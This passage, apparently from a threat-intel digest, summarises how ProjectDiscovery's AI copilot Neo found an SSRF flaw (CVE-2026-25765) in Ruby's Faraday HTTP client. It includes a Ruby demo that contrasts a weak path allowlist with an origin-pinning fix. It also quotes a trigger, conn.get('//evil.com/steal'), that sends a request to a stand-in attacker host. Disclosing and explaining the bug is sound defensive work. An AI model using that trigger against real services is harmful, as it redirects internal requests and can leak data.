TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Project Discovery

How Neo found an SSRF vulnerability in Faraday, and why it matters for every team that ships code

2026-03-03

ATT&CK techniques detected

2 predictions
T1190 Exploit Public-Facing Application (58%)
"a value that passes a 'starts with /' allowlist can still change the destination host. A minimal trigger looks like this:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')

If an attacker can influence that path …"

T1190 Exploit Public-Facing Application (48%)
", like //evil.com, overriding the destination host inside build_exclusive_url
- CVE: CVE-2026-25765
- Severity: Moderate (CVSS 5.8), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
- Affected: Faraday up to 2.14.0
- Fixed: …"
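The excerpts above describe the whole bug: the per-request path is joined onto the client's base URL, and a path beginning with "//" is a network-path reference that keeps the base scheme but replaces the host, so a prefix allowlist on the path ("starts with /") is not a host check. The Ruby below is an added example, not code from the ProjectDiscovery write-up or from Faraday. It reproduces the join step with the standard library's URI#merge on the assumption that Faraday resolves the request path against the base URL with ordinary RFC 3986 reference resolution; the base URL https://api.internal.com and the //evil.com/steal path are taken from the article's trigger snippet, and the function names (resolved_host, weak_path_allowed?, pinned_request_url) are mine.

```ruby
require 'uri'

# Added example, not Faraday's code. Assumes the request path is resolved
# against the base URL with standard RFC 3986 reference resolution (URI#merge).

# Host the request would actually be sent to once `path` is resolved against
# `base`. A path that starts with "//" is a network-path reference: it keeps
# the base scheme but replaces the authority (host and port).
def resolved_host(base, path)
  base_uri = URI.parse(base)
  base_uri.path = '/' if base_uri.path.empty? # keep the join well-defined
  base_uri.merge(path).host
end

# The allowlist the article describes: "starts with /". It accepts
# //evil.com/steal, because that string does start with "/".
def weak_path_allowed?(path)
  path.start_with?('/')
end

# Hardened check: resolve first, then pin scheme, host and port to the base.
# Returns the final URL string, or nil when the resolved target is a different
# origin (or the path is not even a valid URI reference).
def pinned_request_url(base, path)
  base_uri = URI.parse(base)
  base_uri.path = '/' if base_uri.path.empty?
  target = base_uri.merge(path)
  same_origin = target.scheme == base_uri.scheme &&
                target.host == base_uri.host &&
                target.port == base_uri.port
  same_origin ? target.to_s : nil
rescue URI::InvalidURIError
  nil
end

if __FILE__ == $PROGRAM_NAME
  base = 'https://api.internal.com' # base URL from the article's snippet
  ['/users', '//evil.com/steal', 'https://evil.com/x'].each do |path|
    puts format('%-20s weak allowlist: %-5s host after join: %-16s pinned: %s',
                path, weak_path_allowed?(path), resolved_host(base, path),
                pinned_request_url(base, path).inspect)
  end
end
```

Run it and the middle row is the whole finding: "//evil.com/steal" passes the prefix check and still resolves to evil.com. The pinned variant rejects it, as it rejects an absolute URL, while still allowing relative paths under the base. Comparing the resolved origin to the base is the robust check; a blocklist on leading "//" alone misses absolute URLs and, depending on the parser, backslash variants.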

Summary

Executive Summary

Neo found a Server-Side Request Forgery (SSRF) vulnerability in Faraday, a widely used HTTP client library in the Ruby ecosystem. This is Neo's first credited CVE discovery. Neo is ProjectDiscovery's AI security copilot for tasks such as code review and vulnerability discovery. For this finding, Neo reviewed a widely used open source dependency and, without human guidance, surfaced a subtle URL-handling edge case, validated it at runtime, and produced a clear write-up that maint